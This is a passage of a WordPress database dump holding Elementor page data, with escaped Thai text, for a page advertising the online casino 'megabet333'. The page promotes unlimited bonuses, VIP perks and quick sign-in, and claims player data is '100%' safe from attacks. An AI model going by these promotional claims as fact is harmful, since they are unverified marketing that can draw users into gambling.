\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e48\\u0e22\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 24 \\u0e0a\\u0e21. \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e01\\u0e32\\u0e23\\u0e41\\u0e01\\u0e49\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e01\\u0e35\\u0e48\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14 \\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 SSL Encryption \\u0e17\\u0e35\\u0e48\\u0e40\\u0e17\\u0e35\\u0e22\\u0e1a\\u0e40\\u0e17\\u0e48\\u0e32\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e16\\u0e39\\u0e01\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e08\\u0e32\\u0e01\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e21\\u0e15\\u0e35\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e48\\u0e27\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25 100% \\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e22\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e01\\u0e25\\u0e32\\u0e07\\u0e27\\u0e31\\u0e19\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e25\\u0e32\\u0e07\\u0e04\\u0e37\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e1e\\u0e31\\u0e01\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e32\\u0e1a\\u0e23\\u0e37\\u0e48\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1445,175,'_thumbnail_id','60'),(1446,175,'_elementor_edit_mode','builder'),(1447,175,'_elementor_template_type','wp-page'),(1448,175,'_elementor_version','3.32.5'),(1449,175,'_elementor_pro_version','3.32.3'),(1450,175,'_wp_page_template','default'),(1451,175,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1452,175,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>megabet333 <\\/b><\\/a><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 